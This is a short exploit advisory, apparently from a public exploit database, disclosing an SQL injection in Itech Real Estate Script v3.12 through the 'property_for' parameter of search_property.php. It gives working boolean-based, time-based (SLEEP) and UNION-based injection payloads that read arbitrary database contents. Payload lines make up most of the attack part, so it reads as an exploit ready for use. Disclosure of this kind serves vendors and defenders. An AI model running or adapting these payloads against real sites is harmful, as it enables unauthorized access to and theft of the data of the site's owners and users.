34 lines
No EOL
1.3 KiB
Text
34 lines
No EOL
1.3 KiB
Text
Exploit Title: Itech Real Estate Script v3.12 – SQL Injection
|
||
Date: 30.01.2017
|
||
Vendor Homepage: http://itechscripts.com/
|
||
Software Link: http://itechscripts.com/real-estate-script/
|
||
Exploit Author: Kaan KAMIS
|
||
Contact: iletisim[at]k2an[dot]com
|
||
Website: http://k2an.com
|
||
Category: Web Application Exploits
|
||
|
||
Overview
|
||
|
||
Itech Real Estate Script v3.12 is a robust platform for launching real-estate portals. This script is currently available under a special pricing of US$199.
|
||
|
||
Type of vulnerability:
|
||
|
||
An SQL Injection vulnerability in Itech Real Estate Script v3.12 allows attackers to read
|
||
arbitrary data from the database.
|
||
|
||
Vulnerability:
|
||
|
||
http://localhost/real-estate-script/search_property.php?property_for=1[payload]
|
||
|
||
Parameter: property_for (GET)
|
||
Type: boolean-based blind
|
||
Title: AND boolean-based blind - WHERE or HAVING clause
|
||
Payload: property_for=1 AND 4574=4574
|
||
|
||
Type: AND/OR time-based blind
|
||
Title: MySQL >= 5.0.12 AND time-based blind
|
||
Payload: property_for=1 AND SLEEP(5)
|
||
|
||
Type: UNION query
|
||
Title: Generic UNION query (NULL) - 8 columns
|
||
Payload: property_for=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176707a71,0x65546e587a4d65446c625876704b7a784d6651575074684f516f43486d716f5844664870577a6d43,0x7178626b71)-- zLWo |